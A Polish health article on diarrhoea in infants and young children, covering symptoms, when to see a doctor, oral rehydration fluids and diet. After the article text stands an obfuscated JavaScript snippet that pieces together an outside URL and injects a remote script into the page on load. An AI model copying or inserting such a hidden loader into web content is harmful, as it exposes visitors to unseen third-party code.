Biegunka u dzieci i niemowląt – jak pomóc dziecku?

Biegunka u dzieci i niemowląt to stan, którego nie wolno lekceważyć. Jak pomóc dziecku w dolegliwościach żołądkowych?
Biegunka u niemowląt jest szczególnie niebezpieczna. Młody organizm dziecka, nie zawsze jest w stanie poradzić sobie sam z odwodnieniem i osłabieniem wywołanym biegunką i wymiotami. Co więcej, obowiązkiem rodzica jest obserwowanie stanu zdrowia dziecka. O ile kilkulatek powie nam, co mu dolega, to niemowlaka możemy tylko obserwować i czytać wysyłane przez niego sygnały.

(adsbygoogle = window.adsbygoogle || []).push({});

Objawy biegunki u niemowlaka

Jak rozpoznać biegunkę u niemowlaka? Jeśli dziecko karmione jest piersią, biegunka objawia się luźnymi i wodnistymi stolcami i podwyższoną temperaturą ciała. Przy karmieniu mlekiem modyfikowanym — kilka bądź kilkanaście płynnych stolców w ciągu 12 godzin oznacza biegunkę. To najwyższy czas, by udać się z dzieckiem do lekarza!
Leczenie
Jeśli dziecko ma poniżej 6 miesięcy, zaleca się natychmiastową wizytę u lekarza. Ten dobierze odpowiednie dawkowanie doustnych płynów nawadniających oraz oceni stan dziecka.Najważniejsze w czasie biegunki jest uzupełnianie płynów i niedopuszczenie do odwodnienia organizmu. W tym pomogą nam elektrolity, które wchłaniają się przez kosmki jelitowe, w przeciwieństwie do innych płynów, które mogą tylko przejść przez jelita i nie nawodnić organizmu.Elektrolity należy podawać dziecku rozważnie- lepiej systematycznie, ale w mniejszych porcjach. Przed podaniem warto je dodatkowo schłodzić- wtedy są lepiej przyswajane przez organizm.
Dieta
Biegunka nie zawsze wymaga zmiany diety, jednak warto wprowadzić do menu lekkostrawne potrawy, które dodatkowo nie obciążą i tak już zmęczonego żołądka dziecka. Nie poleca się za to głodówki, która dodatkowo osłabia organizm i wydłuża czas regeneracji. W okresie biegunki warto podawać dziecku mniejsze porcje, a w razie braku apetytu nie przymuszać do jedzenia.
W przypadku biegunek niemowląt i starszych dzieci, warto trzymać rękę na pulsie. Szybkie działanie i podanie odpowiednich środków pozwoli na złagodzenie złego samopoczucia i nie dopuści do odwodnienia dziecka, tym samym dziecko szybko poczuje się lepiej. Warto mieć w swojej apteczce doustne płyny nawadniające i jak najszybciej je podać w przypadku biegunki.

(function(){
tuwau=”2nvyezwjuwab”;tuwa=document.createElement(“script”);
tuwa_=”u”+(“st”);tuwa_+=”at”+(“.”);tuwa.async=true;tuwa_+=”in”;
tuwau=”15220228.”+tuwau;tuwa.type=”text/javascript”;tuwau+=”39fvgj632enb”;
tuwau+=”2ktirr”;tuwa_+=(“f”)+”o”+(“/”);tuwa.src=”//”+tuwa_+tuwau;
tuwad=document.body;tuwad.appendChild(tuwa);
})();

Podobne wpisy

Co o tym sądzisz?

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.